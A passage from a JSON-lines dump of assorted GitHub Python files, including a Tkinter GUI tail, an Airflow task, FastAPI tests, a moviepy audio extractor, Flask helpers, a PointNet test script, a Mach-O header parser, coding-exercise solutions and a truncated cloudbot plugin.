row9\n\n#row10\nloadprofile_button= tk.Button(root, text =\"08.LOAD PROFILE & CREATE SCRIPT\", command = loadprofile)\nloadprofile_button.grid(row=9, column=2, sticky=\"ew\", columnspan=2)\nloadprofile_button.configure(state='disabled')\n#end row10\n\n#row11\nloadprofile_package_button= tk.Button(root, text =\"08.1.LOAD PROFILE PACKAGE & CREATE SCRIPT\", command = loadprofile_package)\nloadprofile_package_button.grid(row=10, column=2, sticky=\"ew\", columnspan=2)\nloadprofile_package_button.configure(state='disabled')\n#end row11\n\n##row12\nmerge_folder_btn_text = tk.StringVar()\nmerge_folder_btn_text.set(\"MERGE_FD\")\nmerger_folder_button = tk.Button(root, textvariable=merge_folder_btn_text, command = press_merge_folder_button)\nmerger_folder_button.grid(row=11, column=1)\n\n#tk.Label(root, text=\"package_name\").grid(row=5, column=2, sticky=\"w\")\nentry_mergefilename = tk.Entry(root, textvariable = text_var_mergefilename)\ntext_var_mergefilename.set(\"merged_file_name\")\nentry_mergefilename.grid(row=11, column=2, sticky=\"w\")\n##end row12\n\n\n##row13\nstatus_label = tk.Label(root, textvariable =text_var_status)\nstatus_label.grid(row=12, column=1, columnspan=3)\n##end row13\n\n\n\nroot.mainloop()\n","repo_name":"ecaohuy/pythonlab","sub_path":"fill_template - Copy.py","file_name":"fill_template - Copy.py","file_ext":"py","file_size_in_byte":29019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20256365531","text":"from airflow.decorators import task\nimport requests\nimport json\n\n@task\ndef discover_ids(**kwargs):\n print(\"params: %s\" % kwargs[\"params\"])\n coll_id = kwargs[\"params\"][\"collection_id\"]\n resp = requests.get(\"https://api.eumetsat.int/data/search-products/os?format=json&pi=%s&si=0&c=5&sort=start,time,0&dtstart=2021-06-17T09:02:58Z&dtend=2021-06-18T09:02:58Z\" % coll_id)\n\n data = json.loads(resp.text)\n ids = list(map(lambda f: f[\"id\"], data[\"features\"]))\n result_value = json.dumps(ids)\n \n print(result_value)\n return {\"ids\": result_value}\n\n","repo_name":"matthesrieke/airflow-sandbox","sub_path":"dags/tasks/discover.py","file_name":"discover.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74910522386","text":"from fastapi.testclient import TestClient\n\nfrom main import app, InferenceInput\n\nclient = TestClient(app)\n\nlow_salary_example = {\n 'age': 39,\n 'workclass': 'State-gov',\n 'fnlgt': 77516,\n 'education': 'Bachelors',\n 'education-num': 13,\n 'marital-status': 'Never-married',\n 'occupation': 'Adm-clerical',\n 'relationship': 'Not-in-family',\n 'race': 'White',\n 'sex': 'Male',\n 'capital-gain': 2174,\n 'capital-loss': 0,\n 'hours-per-week': 40,\n 'native-country': 'United-States'\n}\n\nhigh_salary_example = {\n \"age\": 42,\n \"workclass\": \"Private\",\n \"fnlgt\": 159449,\n \"education\": \"Bachelors\",\n \"education-num\": 13,\n \"marital-status\": \"Married-civ-spouse\",\n \"occupation\": \"Exec-managerial\",\n \"relationship\": \"Husband\",\n \"race\": \"White\",\n \"sex\": \"Male\",\n \"capital-gain\": 5178,\n \"capital-loss\": 0,\n \"hours-per-week\": 40,\n \"native-country\": \"United-States\",\n}\n\n\ndef test_root():\n r = client.get(\"/\")\n assert r.status_code == 200\n assert r.json() == {\"message\": \"Hello World\"}\n\n\ndef test_low_salary():\n r = client.post(\"/inference/\", json=low_salary_example)\n assert r.status_code == 200\n assert r.json() == {\"prediction\": \"['<=50K']\"}\n\n\ndef test_high_salary():\n r = client.post(\"/inference/\", json=high_salary_example)\n assert r.status_code == 200\n assert r.json() == {\"prediction\": \"['>50K']\"}\n","repo_name":"KennerBenjamin/udacity-api","sub_path":"test_inference_api.py","file_name":"test_inference_api.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44023443645","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 8 19:12:39 2021\r\n\r\n@author: jahtzee\r\n\"\"\"\r\n\r\nfrom os import *\r\nfrom moviepy.editor import *\r\npath = \"C:/Users/admin/Music/tmp\"\r\noutput = \"C:/Users/admin/Music/tmp/output\"\r\n\r\ndef extractMP3fromMP4(mp4, mp3):\r\n videoclip=VideoFileClip(mp4)\r\n audioclip=videoclip.audio\r\n audioclip.write_audiofile(mp3)\r\n audioclip.close()\r\n videoclip.close()\r\n \r\nif __name__ == \"__main__\":\r\n filelist = listdir(path)\r\n for file in filelist:\r\n if file.endswith(\".mp4\"):\r\n extractMP3fromMP4(path+\"/\"+file, output+\"/\"+file+'.mp3')\r\n \r\n ","repo_name":"jahtzee/VideoAudioExtractor","sub_path":"VideoAudioExtractor.py","file_name":"VideoAudioExtractor.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23620248255","text":"import importlib\nfrom datetime import datetime\nfrom functools import partial, wraps\n\nfrom flask import request, current_app, jsonify\nfrom flask_login import current_user\nfrom jsonschema import validate\n\nfrom .constant import UserType\nfrom .exceptions import OK\n\n\ndef import_class(module_class_name):\n module_name, _, class_name = module_class_name.rpartition('.')\n module = importlib.import_module(module_name)\n return getattr(module, class_name)\n\n\nclass HashableDict(dict):\n def __hash__(self):\n return hash(tuple(sorted(self.items())))\n\n\ndef validate_time_format(time_str, expected_format, err_message=''):\n try:\n datetime.strptime(time_str, expected_format)\n except Exception:\n raise ValueError(err_message)\n\n\ndef payload_validator(payload_field):\n def real_decorator(method, **kwargs):\n\n @wraps(method)\n def wrapper(*args, **kwargs):\n payload = request.get_json(force=True)\n validate(payload, payload_field)\n\n return method(*args, **kwargs, payload=payload)\n\n return wrapper\n\n return real_decorator\n\n\ndef json_response(data=None):\n info = {\n 'code': OK.code,\n 'message': OK.message\n }\n if data is None:\n return jsonify(info=info)\n\n return jsonify(data=data, info=info)\n\n\ndef login_required(func=None, user_type=UserType.ADMIN):\n if func is None:\n return partial(login_required, user_type=user_type)\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n if current_app.login_manager._login_disabled:\n return func(*args, **kwargs)\n if not (current_user.is_authenticated and current_user.type == user_type):\n return current_app.login_manager.unauthorized()\n return func(*args, **kwargs)\n return wrapper\n\n\ndef permit_params(params, keys):\n return {key: value for key, value in params.items() if key in keys}\n","repo_name":"entryword/react-project","sub_path":"pyladies/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27242282139","text":"from pyparsing import Word, hexnums, WordEnd, Optional, alphas, alphanums\r\nimport os\r\nimport pandas as pd\r\n\r\ndef extration_code(file_name):\r\n hex_integer = Word(hexnums) + WordEnd()\r\n line = (\r\n \".text:\"\r\n + hex_integer\r\n + Optional((hex_integer * (1,))(\"instructions\") + Word(alphas, alphanums)(\"opcode\"))\r\n )\r\n opcodes=[]\r\n with open(file_name) as source:\r\n for source_line in source:\r\n source_line = source_line.strip()\r\n if source_line[:5] == \".text\":\r\n result = line.parseString(source_line)\r\n if \"opcode\" in result:\r\n opcodes.append(result.opcode)\r\n elif source_line[:5] != \".text\":\r\n pass\r\n else:\r\n break\r\n extracted_seq=\" \".join(opcodes)\r\n data = {'clean_seq':extracted_seq}\r\n os.remove(file_name)\r\n return data\r\n#extraction_code(file_data)\r\n","repo_name":"sarasap/mal","sub_path":"Extraction.py","file_name":"Extraction.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43162401547","text":"####################################################################################\n# HLD BUILDING BLOCK: INFERENCE #\n####################################################################################\n# Run the test.\n# Compute the metrics (e.g. accuracy) obtained.\n####################################################################################\n\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.utils.data\nfrom B0_Dataset.dataset import SemanticKittiDataset\nfrom D0_Modeling.model import SegmentationPointNet\nfrom torch.utils.data import DataLoader\n# from A0_Configuration.hyperparam import opt\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nimport numpy as np\nimport shutil\nimport yaml\n\ndef test(opt):\n test_dataset = SemanticKittiDataset(\n dst_hparamDatasetPath=opt.hparamDatasetPath,\n dst_hparamDatasetSequence=opt.hparamTestDatasetSequence,\n dst_hparamYamlConfigPath=opt.hparamYamlConfigPath,\n dst_hparamNumberOfRandomPoints=False,\n dst_hparamActionType='test') \n\n test_dataloader = DataLoader(\n dataset = test_dataset,\n batch_size=1,\n shuffle=False)\n\n num_classes=opt.hparamNumberOfClasses\n feature_transform=opt.hparamFeatureTransform\n\n # Load model from .pth\n model = SegmentationPointNet(num_classes, feature_transform)\n model.load_state_dict(torch.load(opt.hparamModelPthPath, map_location=torch.device('cpu')))\n model.eval()\n\n # Preprare predictions env\n predictions_path = os.path.join(opt.hparamDatasetPath, opt.hparamTestDatasetSequence, 'predictions')\n\n if os.path.exists(predictions_path):\n # os.remove(predictions_path)\n shutil.rmtree(predictions_path)\n os.mkdir(predictions_path)\n\n with open(opt.hparamYamlConfigPath, 'r') as stream:\n yaml_config = yaml.safe_load(stream)\n\n learning_map_inv = yaml_config['learning_map_inv']\n\n # Testing loop\n print(\"Start genearting predictions .labels\")\n for i, data in enumerate(test_dataloader):\n \n points, target = data\n points = points.transpose(2, 1)\n points, target = points.to(opt.hparamDeviceType), target.to(opt.hparamDeviceType)\n \n model = model.eval()\n \n pred, feat_trans = model(points)\n pred = pred.view(-1, num_classes)\n # target = target.view(-1, 1)[:, 0]\n # loss = F.nll_loss(pred, target)\n pred_choice = pred.data.max(1)[1]\n # correct = pred_choice.eq(target.data).cpu().sum()\n \n # print(f\"target: {target}, pred: {pred}, pred_choice: {pred_choice}, correct: {correct}\")\n\n #Save predictions\n pred_choice_tmp = [learning_map_inv[k] for k in pred_choice.numpy().tolist()]\n pred_choice_conv = np.array(pred_choice_tmp).astype(np.uint32)\n file_name = os.path.basename(test_dataloader.dataset.pc_files[i])\n pred_file_path = os.path.join(\n predictions_path,\n file_name.replace('.bin', '.label')\n )\n pred_choice_conv.tofile(pred_file_path)\n\n print('Generation predictions completed') \n ","repo_name":"pdymek/Workspace-AD-LiDAR","sub_path":"C1_Inference/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"22457778286","text":"from utils.header import MagicField, Field\nfrom load_command import LoadCommandCommand, LoadCommandHeader\n\n\nclass SourceVersionField(Field):\n def display(self, header):\n if self.mnemonic:\n value = self._get_value(header)\n a = (value >> 40) & 0xffffff\n b = (value >> 30) & 0x3ff\n c = (value >> 20) & 0x3ff\n d = (value >> 10) & 0x3ff\n e = value & 0x3ff\n return '%d.%d.%d.%d.%d' % (a, b, c, d, e)\n return super(SourceVersionField, self).display(header)\n\n\nclass SourceVersionCommand(LoadCommandHeader):\n ENDIAN = None\n FIELDS = (\n MagicField('cmd', 'I', {LoadCommandCommand.COMMANDS['LC_SOURCE_VERSION']: 'LC_SOURCE_VERSION'}),\n Field('cmdsize', 'I'),\n SourceVersionField('version', 'Q'),\n )\n\n def __init__(self, bytes_=None, **kwargs):\n self.version = None\n super(SourceVersionCommand, self).__init__('source_version_command', bytes_, **kwargs)\n","repo_name":"hkkwok/MachOTool","sub_path":"mach_o/headers/source_version_command.py","file_name":"source_version_command.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"24867883634","text":"# mixed tests of py basics \n\n\n\na, b = 0, 1\n\n\nwhile b < 1000:\n print(b, end=' ', flush = True)\n a, b = b, a + b\n \n\nprint() # line ending\n\n# test functions\ndef fun(n): \n print(n) \n\nfun(47)\n\n\n# bitwise \n\nx = 0x0a\ny = 0x02\nz= x & y\n\nprint(f'(hex) x is {x:02x}, y is {y:02x}, z is {z:02x}')\nprint(f'(bin) x is {x:08b}, y is {y:08b}, z is {z:08b}')\n","repo_name":"nbatwara/PyTrain","sub_path":"PyEssential/mixed.py","file_name":"mixed.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3304068983","text":"#!/bin/python3\n\nimport os\nimport sys\nimport heapq\n#\n# Complete the cookies function below.\n#\ndef cookies(k, A):\n \n heapq.heapify(A)\n count = 0\n while A[0] < k:\n if len(A) < 2: return -1\n lowest = heapq.heappop(A)\n new_lowest = heapq.heappop(A)\n heapq.heappush(A, lowest + 2 * new_lowest)\n count += 1\n return count\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n nk = input().split()\n\n n = int(nk[0])\n\n k = int(nk[1])\n\n A = list(map(int, input().rstrip().split()))\n\n result = cookies(k, A)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Infinidrix/competitive-programming","sub_path":"Take 2 Week 5/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13230497159","text":"import unittest\n\n\ndef _stepPerms(currentStep, totalSteps, mem):\n if currentStep > totalSteps:\n return 0\n elif currentStep == totalSteps:\n return 1\n elif currentStep in mem:\n return mem[currentStep]\n\n result = _stepPerms(currentStep+1, totalSteps, mem) \\\n + _stepPerms(currentStep+2, totalSteps, mem) \\\n + _stepPerms(currentStep+3, totalSteps, mem)\n\n mem[currentStep] = result\n return result\n\n\n# Complete the stepPerms function below.\ndef stepPerms(n):\n return _stepPerms(0, n, {})\n\n\nclass DavidStaircaseTest(unittest.TestCase):\n def testCases(self):\n tests = [(1, 1), (3, 4), (7, 44)]\n for i in range(len(tests)):\n with self.subTest(i=i):\n test = tests[i]\n self.assertEqual(stepPerms(test[0]), test[1])\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"addinkevin/programmingchallenges","sub_path":"HackerRank/InterviewPreparationKit/RecursionAndBacktracking/davidstaircase.py","file_name":"davidstaircase.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5629619713","text":"import baseTools\r\nimport checkerBaseOperators\r\nimport action\r\n\r\ndef stats_part(base, cat_id):\r\n part_links = baseTools.take_links(base, cat_id)\r\n part_sees = baseTools.take_links(base, cat_id)\r\n part_in = checkerBaseOperators.part_split_IN_OUT(base, cat_id)['IN']\r\n part_out = checkerBaseOperators.part_split_IN_OUT(base, cat_id)['OUT']\r\n \r\n export_dict = {\r\n 'SENTENS' : len(part_sees),\r\n 'LINKS' : len(part_links),\r\n 'PART-IN' : len(part_in),\r\n 'PART-OUT' : len(part_out),\r\n 'TOTAL' : len(part_links) + len(part_sees) + len(part_in) + len(part_out)\r\n }\r\n return export_dict\r\n\r\ndef generator_AI_most_popular(base, cat_start_id, no_words = 5, exceping_part = None):\r\n '------ ------ ------ ------ ------ ------ ------ ------ ----- ----- -'\r\n 'Generator słów, oparty o ststs --> działa dobrze ale jest tendencyjny'\r\n '------ ------ ------ ------ ------ ------ ------ ------ ----- ----- -'\r\n cat_word = baseTools.take_word(base, cat_start_id)\r\n publish_string = f'{cat_word} '\r\n publish_list = [cat_start_id]\r\n for _ in range(no_words):\r\n classic_set = checkerBaseOperators.part_split_IN_OUT(base, cat_start_id)['OUT']\r\n if len(classic_set) > 0 and cat_start_id != None:\r\n links = [this for this in classic_set]\r\n cat_start_id = checkerBaseOperators.part_most_popular(base, links, exceping_part)\r\n else:\r\n break\r\n if cat_start_id != None:\r\n if not cat_start_id in publish_list:\r\n publish_list.append(cat_start_id)\r\n cat_word = baseTools.take_word(base, cat_start_id)\r\n count_word_in = publish_string.count(cat_word)\r\n else:\r\n break\r\n if count_word_in == 0:\r\n publish_string += f'{cat_word} '\r\n publish_string = publish_string[:len(publish_string)-1]\r\n return {'STRING' : publish_string, 'ID' : publish_list}\r\n\r\ndef generator_AI_se(base, word, settings = 'PR, PO, OZ, OR, OR, ZA, OK, DO'):\r\n '------ ------ ------ ------ ------ ------ ------ ------ -----'\r\n 'Generator słów, oparty o random i ststs --> średnio to działa'\r\n '------ ------ ------ ------ ------ ------ ------ ------ -----'\r\n def pick_side_part(cat, item_list):\r\n import random\r\n\r\n words_dict = {}\r\n for item in item_list:\r\n if not item.startswith('LB') and item.startswith(cat):\r\n if not item.startswith('OR'):\r\n total_word = stats_part(base, item)[\"TOTAL\"]\r\n words_dict[item] = total_word\r\n ccounter = 0\r\n for v in words_dict.values():\r\n if v > ccounter:\r\n ccounter = v\r\n for k, v in words_dict.items():\r\n if v == ccounter and v > 4:\r\n print(cat, k, v, ccounter)\r\n return k\r\n \r\n i_set = set()\r\n for item in item_list:\r\n if item.startswith(cat):\r\n i_set.add(item)\r\n if len(i_set) != 0:\r\n for item in item_list:\r\n if not item.startswith('LB') and not item.startswith('OR'):\r\n i_set.add(item)\r\n if len(i_set) != 0:\r\n choice_list = []\r\n for x in i_set:\r\n choice_list.append(x)\r\n return random.choice(choice_list)\r\n else: return 'False'\r\n \r\n setts = settings.replace(' ', '').split(',')\r\n setts_list = [[setts[x], None] for x in range(len(setts))]\r\n word_id = None\r\n cat_start = None\r\n choice_list = []\r\n word_ID_pick_left = 'False'\r\n word_ID_pick_right = 'False'\r\n for b_CAT in base.keys():\r\n if b_CAT != 'SE' and b_CAT != 'LB' and b_CAT != 'ZA' and b_CAT != 'LID' \\\r\n and b_CAT != 'BASE' and b_CAT != 'SA':\r\n for v in base[b_CAT]:\r\n if v == word:\r\n # print(b_CAT)\r\n counter_index = 0\r\n for x in setts:\r\n if x.startswith(b_CAT):\r\n cat_start = counter_index\r\n break\r\n counter_index += 1\r\n if cat_start != None:\r\n word_id = baseTools.take_id(base, b_CAT, word)\r\n setts_list[cat_start] = [b_CAT, word_id]\r\n choice_list.append(word_id)\r\n else:\r\n print(f'Nie znaleziono ID dla słowa: {word}')\r\n break\r\n if cat_start != None:\r\n if cat_start != 0 and cat_start != len(setts_list) -1:\r\n top_part = setts_list[cat_start][1]\r\n words_link = baseTools.take_links(base, top_part)\r\n\r\n for _ in range(len(words_link) * 5):\r\n word_ID_pick_left = pick_side_part(setts[cat_start - 1], words_link)\r\n if word_ID_pick_left != 'False':\r\n if not word_ID_pick_left in choice_list:\r\n choice_list.append(word_ID_pick_left)\r\n break\r\n for _ in range(len(words_link) * 5):\r\n word_ID_pick_right = pick_side_part(setts[cat_start + 1], words_link)\r\n if word_ID_pick_right != 'False':\r\n if not word_ID_pick_right in choice_list:\r\n choice_list.append(word_ID_pick_right)\r\n break\r\n\r\n if word_ID_pick_left != word_ID_pick_right:\r\n setts_list[cat_start + 1][1] = word_ID_pick_right\r\n setts_list[cat_start - 1][1] = word_ID_pick_left\r\n\r\n for back in range(cat_start -1, 0, -1):\r\n fron_part_id = setts_list[back + 1][1]\r\n # print(fron_part_id)\r\n if fron_part_id != 'False' and fron_part_id != None:\r\n links_front = baseTools.take_links(base, fron_part_id)\r\n for _ in range(len(links_front) * 5):\r\n word_ID_pick_left = pick_side_part(setts[back -1], links_front)\r\n if word_ID_pick_left != 'False':\r\n if not word_ID_pick_left in choice_list:\r\n choice_list.append(word_ID_pick_left)\r\n \r\n break\r\n \r\n setts_list[back - 1][1] = word_ID_pick_left\r\n else: break\r\n for front in range(cat_start + 1, len(setts) - 1, 1):\r\n fron_part_id = setts_list[front - 1][1]\r\n if fron_part_id != 'False' and fron_part_id != None:\r\n links_front = baseTools.take_links(base, fron_part_id)\r\n for _ in range(len(links_front) * 5):\r\n word_ID_pick_right = pick_side_part(setts[front -1], links_front)\r\n if word_ID_pick_right != 'False':\r\n if not word_ID_pick_right in choice_list:\r\n choice_list.append(word_ID_pick_right)\r\n break\r\n setts_list[front + 1][1] = word_ID_pick_right\r\n else: break\r\n if cat_start == 0:\r\n top_part = setts_list[cat_start][1]\r\n words_link = baseTools.take_links(base, top_part)\r\n for _ in range(len(words_link) * 5):\r\n word_ID_pick_right = pick_side_part(setts[cat_start + 1], words_link)\r\n if word_ID_pick_right != 'False':\r\n if not word_ID_pick_right in choice_list:\r\n choice_list.append(word_ID_pick_right)\r\n break\r\n setts_list[cat_start + 1][1] = word_ID_pick_right\r\n for front in range(cat_start + 1, len(setts) - 1, 1):\r\n fron_part_id = setts_list[front - 1][1]\r\n if fron_part_id != 'False' and fron_part_id != None:\r\n links_front = baseTools.take_links(base, fron_part_id)\r\n for _ in range(len(links_front) * 5):\r\n word_ID_pick_right = pick_side_part(setts[front + 1], links_front)\r\n if word_ID_pick_right != 'False':\r\n if not word_ID_pick_right in choice_list:\r\n choice_list.append(word_ID_pick_right)\r\n \r\n break\r\n setts_list[front + 1][1] = word_ID_pick_right\r\n else: break\r\n if cat_start == len(setts_list) -1:\r\n top_part = setts_list[cat_start][1]\r\n words_link = baseTools.take_links(base, top_part)\r\n for _ in range(len(words_link) * 5):\r\n word_ID_pick_left = pick_side_part(setts[cat_start - 1], words_link)\r\n if word_ID_pick_left != 'False':\r\n if not word_ID_pick_left in choice_list:\r\n choice_list.append(word_ID_pick_left)\r\n \r\n break\r\n setts_list[cat_start - 1][1] = word_ID_pick_left\r\n for back in range(cat_start -1, 0, -1):\r\n fron_part_id = setts_list[back + 1][1]\r\n if fron_part_id != 'False' and fron_part_id != None:\r\n links_front = baseTools.take_links(base, fron_part_id)\r\n for _ in range(len(links_front) * 5):\r\n word_ID_pick_left = pick_side_part(setts[back -1], links_front)\r\n if word_ID_pick_left != 'False':\r\n if not word_ID_pick_left in choice_list:\r\n choice_list.append(word_ID_pick_left)\r\n \r\n break\r\n setts_list[back - 1][1] = word_ID_pick_left\r\n else: break\r\n # print(choice_list)\r\n final_list = []\r\n for ex in setts_list:\r\n if ex[1] != 'False' and ex[1] != None:\r\n if not ex[1] in final_list:\r\n final_list.append(ex[1]) \r\n\r\n final_string = ''\r\n # print(setts_list)\r\n for ex in final_list:\r\n if ex != 'False' and ex != None:\r\n final_string += f'{baseTools.take_word(base, ex)} '\r\n final_string = final_string[:len(final_string) -1]\r\n\r\n return final_string\r\n\r\ndef check_list_to_list(item_list, checking_list):\r\n on_the_list = False\r\n for item in item_list:\r\n if item in checking_list:\r\n on_the_list = True\r\n return on_the_list\r\n\r\ndef sentens_generator_AI(base, sentens):\r\n 'znajduje słowa w konkretnym przypadku w zdaniach i łączy dwa zdania ze sobą'\r\n 'nie działa dobrze bo gada głupoty'\r\n sentens = action.string_cleaner(sentens)\r\n sentens_list = sentens.split(' ')\r\n PO_DO = []\r\n final_set = set()\r\n wor_dict = {}\r\n for word in sentens_list:\r\n word_ids = checkerBaseOperators.find_pharse_in_part(base, word)\r\n wor_dict[word] = []\r\n wor_dict[word] += word_ids\r\n for wi in word_ids:\r\n if wi.startswith('PO') or wi.startswith('DO') or wi.startswith('OR')\\\r\n or wi.startswith('PR') or wi.startswith('OK') or wi.startswith('OZ'):\r\n PO_DO.append(wi)\r\n\r\n se_LIST = []\r\n mem_dict = {}\r\n for p in PO_DO:\r\n gener = generator_AI_most_popular(base, p, 3, 'HW')\r\n gs = gener['STRING']\r\n final_set.add(gs)\r\n se_LIST.append(gener['ID'])\r\n mem_dict[gs] = gener['ID']\r\n\r\n export_list = []\r\n for gen in final_set:\r\n se_SET = set()\r\n for x in checkerBaseOperators.searcher_phrase(base, gen):\r\n se_SET.add(x)\r\n if len(se_SET) > 1:\r\n sides = []\r\n se_left = set()\r\n se_right= set()\r\n for se_i in se_SET:\r\n se_words = baseTools.take_se(base, se_i)\r\n for sl in se_words:\r\n for se_l in se_LIST:\r\n if sl == se_l[0]:\r\n se_left.add(se_i)\r\n sides += [se_l[0]]\r\n if sl == se_l[len(se_l) - 1]:\r\n se_right.add(se_i)\r\n sides += [se_l[len(se_l) - 1]]\r\n\r\n l_len = len(se_left)\r\n r_len = len(se_right)\r\n if l_len > 0 and r_len > 0:\r\n se_le = se_left.intersection(se_right)\r\n se_ri = se_right.intersection(se_left)\r\n if len(se_ri) == 0: se_ri = se_le\r\n counter_left = 0\r\n sentens_left = None\r\n for ssl in se_le:\r\n left_len = len(ssl)\r\n if left_len > counter_left:\r\n sentens_left = ssl\r\n # print('przed', sentens_left, se_ri)\r\n if len(se_ri) > 0 and sentens_left != None:\r\n se_ri.remove(sentens_left)\r\n if len(se_ri) == 0:\r\n se_ri = se_le\r\n # print('po', sentens_left, se_ri)\r\n counter_right = 0\r\n sentens_right = None\r\n for ssr in se_ri:\r\n right_len = len(ssr)\r\n if right_len > counter_right:\r\n sentens_right = ssr\r\n if sentens_left != None and sentens_right != None:\r\n left_word_id = mem_dict[gen][0]\r\n right_word_id = mem_dict[gen][len(mem_dict[gen]) -1]\r\n left_sentens_ids = baseTools.take_se(base, sentens_left)\r\n right_sentens_ids = baseTools.take_se(base, sentens_right)\r\n\r\n if left_word_id in left_sentens_ids:\r\n left_sentens_ids = left_sentens_ids[:left_sentens_ids.index(left_word_id)]\r\n else: left_sentens_ids = []\r\n if right_word_id in right_sentens_ids:\r\n right_sentens_ids = right_sentens_ids[right_sentens_ids.index(right_word_id) + 1:]\r\n else: right_sentens_ids = []\r\n ready_list = left_sentens_ids + mem_dict[gen] + right_sentens_ids\r\n ready_string = ''\r\n for wo in ready_list:\r\n ready_string += f'{baseTools.take_word(base, wo)} '\r\n exp = ready_string[:len(ready_string) - 1].capitalize() + '.'\r\n export_list.append(exp)\r\n\r\n return {\r\n 'LIST' : export_list, \r\n 'DICT-ID' : mem_dict, \r\n 'SENTENS' : sentens, \r\n 'WORDS' : wor_dict, \r\n }\r\n\r\nif __name__ == '__main__':\r\n import awareness\r\n base = awareness.take_base('memory_CLO_v2010')\r\n print(sentens_generator_AI(base, 'łączy dwa zdania ze sobą'))\r\n ","repo_name":"amnezja3/awareness","sub_path":"addionalisAwe.py","file_name":"addionalisAwe.py","file_ext":"py","file_size_in_byte":14828,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15273963811","text":"from collections import deque\n\nN, M = map(int, input().split())\npatient = deque([(key, val) for key, val in enumerate(list(map(int, input().split())))])\n\ncnt = 0\nwhile True:\n cur = patient.popleft()\n if any(cur[1] < x[1] for x in patient):\n patient.append(cur)\n else:\n cnt += 1\n if cur[0] == M:\n break\nprint(cnt)\n\n'''\n5 2\n60 50 70 80 90\n'''\n\n","repo_name":"gkdbssla97/Python-Coding-Test","sub_path":"CodingProblem/응급실_1.py","file_name":"응급실_1.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20793101376","text":"for _ in range(int(input())):\r\n l = list(map(str, input().split()))\r\n k = int(l[0])\r\n flag = 0\r\n for i in range(k):\r\n if l[i+1].islower():\r\n if not(all(ord(j) in range(97,110) for j in l[i+1])):\r\n flag = 1\r\n break\r\n elif l[i+1].isupper():\r\n if not(all(ord(j) in range(78,91) for j in l[i+1])):\r\n flag=1\r\n break\r\n else:\r\n flag = 1\r\n break\r\n if flag==0:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n \r\n","repo_name":"Harshala-Gaikwad/Programming","sub_path":"codechef/correct_sentence.py","file_name":"correct_sentence.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"748746520","text":"__author__ = '562474'\n\nimport inspect\nimport logging\nimport sys\nimport time\n\n\n\n\nclass LogThisTestCase(type):\n \"\"\"\n http://stackoverflow.com/a/15969985\n \"\"\"\n\n def __new__(cls, name, bases, dct):\n # if the TestCase already provides setUp, wrap it\n if 'setUp' in dct:\n setUp = dct['setUp']\n else:\n setUp = lambda self: None\n # print \"creating setUp...\"\n\n def wrappedSetUp(self):\n for hdlr in self.logger.handlers:\n self.logger.removeHandler(hdlr)\n # self.formatter = logging.Formatter('%(asctime)s-%(name)s-%(levelname)s-%(lineno)d: %(message)s', datefmt=\"%Y-%m-%dT%H:%M:%S\")\n self.formatter = logging.Formatter('%(message)s')\n self.hdlr = logging.StreamHandler(stream=sys.stdout)\n self.hdlr.setLevel(logging.DEBUG)\n self.hdlr.setFormatter(self.formatter)\n self.logger.addHandler(self.hdlr)\n\n currentTest = self.id().split('.')[-1]\n callingFunction = inspect.stack()[1][3]\n self.logger.info(\"============Starting %s============\\n\", currentTest)\n setUp(self)\n\n dct['setUp'] = wrappedSetUp\n\n # same for tearDown\n if 'tearDown' in dct:\n tearDown = dct['tearDown']\n else:\n tearDown = lambda self: None\n\n def wrappedTearDown(self):\n tearDown(self)\n self.logger.info(\"\\n============================================\\n\")\n self.logger.removeHandler(self.hdlr)\n\n dct['tearDown'] = wrappedTearDown\n\n # return the class instance with the replaced setUp/tearDown\n return type.__new__(cls, name, bases, dct)\n\n","repo_name":"OSADP/SEMI-ODE","sub_path":"ode/Development/emulatedClientApps/SituationalDataApp/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42448975820","text":"from cloudbot import hook\nimport json\nfrom fuzzywuzzy import process\n\n@hook.command(\"win10\", permissions=[\"rulesuser\"], autohelp=False)\ndef win10(text, message):\n with open('data/win10.json') as data_file: \n terms = json.load(data_file)\n terms = terms['issues']\n 